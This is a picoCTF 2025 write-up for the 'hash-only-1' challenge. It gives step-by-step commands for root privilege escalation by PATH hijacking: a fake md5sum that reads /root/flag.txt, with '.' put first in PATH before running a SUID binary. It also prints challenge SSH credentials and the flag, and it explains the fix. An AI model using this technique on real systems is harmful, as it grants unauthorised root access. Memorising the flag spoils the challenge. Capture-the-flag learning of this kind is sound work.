hash-only-1 picoCTF 2025 Solution

Published: April 2, 2025

Description

The flaghasher binary runs with elevated privileges but only prints md5sum /root/flag.txt. Hijack the PATH so md5sum points to your own script that cats the flag.

SSH to shape-facility.picoctf.net -p 51426 (password 8d076785).

Confirm flaghasher is SUID-root and pull its strings to see what it shells out to.

Build a fake md5sum in your home directory and put . first in PATH so it wins the lookup.

bash
ssh -p 51426 ctf-player@shape-facility.picoctf.net
bash
ls -la flaghasher
bash
strings flaghasher | grep -E 'md5sum|/bin/'
bash
echo '/bin/cat /root/flag.txt' > md5sum && chmod +x md5sum
bash
export PATH=.:$PATH && ./flaghasher
PATH hijacking is the bread-and-butter of SUID privilege escalation; the Linux CLI for CTF guide covers strings, PATH, and SUID enumeration in depth.
  1. Step 1Discover the helper call
    strings flaghasher produces hundreds of lines, so always pipe straight into grep rather than scrolling. The hit is /bin/bash -c 'md5sum /root/flag.txt'. The bare md5sum (no leading /) means Linux resolves it via PATH - so you control which binary runs.
    bash
    strings flaghasher | grep md5sum
    bash
    # Output: /bin/bash -c 'md5sum /root/flag.txt'
    Learn more

    PATH injection (also called PATH hijacking) exploits the fact that Linux resolves command names by searching directories listed in the PATH environment variable in order from left to right. When a program calls a command by name without specifying an absolute path (e.g., md5sum instead of /usr/bin/md5sum), the OS finds whatever file named md5sum appears first in PATH.

    The strings command is a first-line static analysis tool. Running it on any SUID binary quickly reveals hardcoded paths, system calls, and - as here - the exact shell command being executed. When that command uses an unqualified binary name (no leading /), PATH injection becomes viable. Real-world SUID binaries have historically been vulnerable to this in many Linux distributions.

    SUID (Set User ID) bits allow a binary to run with the permissions of its owner rather than the permissions of whoever executes it. A SUID binary owned by root runs as root regardless of which user launches it. This makes SUID binaries high-value targets for privilege escalation - any vulnerability in them potentially grants root access. Modern systems minimize SUID binaries and use capabilities or sudo policies instead.

  2. Step 2Drop in a fake md5sum
    Write a one-line md5sum that cats the flag, chmod +x, prepend . to PATH, and verify PATH order before running flaghasher. Critically, the fake script must NOT call any program named md5sum (no /usr/bin/md5sum, no recursion fallback) or the hijacked PATH will resolve it back to your own script and infinite-loop. If you SSH out and back in, PATH resets - re-export it.
    bash
    echo '/bin/cat /root/flag.txt' > md5sum
    bash
    chmod +x md5sum
    bash
    export PATH=.:$PATH
    bash
    echo $PATH | tr ':' '\n' | head -3   # verify '.' is first
    bash
    ./flaghasher
    Learn more

    Prepending . (the current directory) to PATH is a classic privilege escalation technique. The current directory is never in PATH by default on modern Linux systems specifically because of this attack - if it were, any malicious executable in the current directory would shadow system commands. However, PATH can be freely modified in a shell session, so an attacker who controls PATH can plant fake commands anywhere in the search order.

    The fake md5sum script demonstrates the principle of command substitution: replacing a legitimate system utility with a malicious one. In real penetration testing, this technique is used to establish persistence (replacing cron-invoked scripts), escalate privileges (replacing commands called by SUID binaries), or intercept sensitive data (replacing commands like ssh that handle credentials).

    The correct fix is for flaghasher to use the absolute path /usr/bin/md5sum instead of the bare name md5sum, and to sanitize or reset the PATH environment variable before calling any external commands. This is documented in the POSIX specification and in secure coding guidelines from CERT, MITRE, and CWE-78 (Improper Neutralization of Special Elements used in an OS Command).

Flag

picoCTF{sy5teM_b!n@riEs_4r3_5c@red_0f_yoU_bfa4...}

Classic PATH hijacking, so always check PATH order when privileged scripts invoke system tools.

Want more picoCTF 2025 writeups?

Useful tools for Binary Exploitation

Related reading

What to try next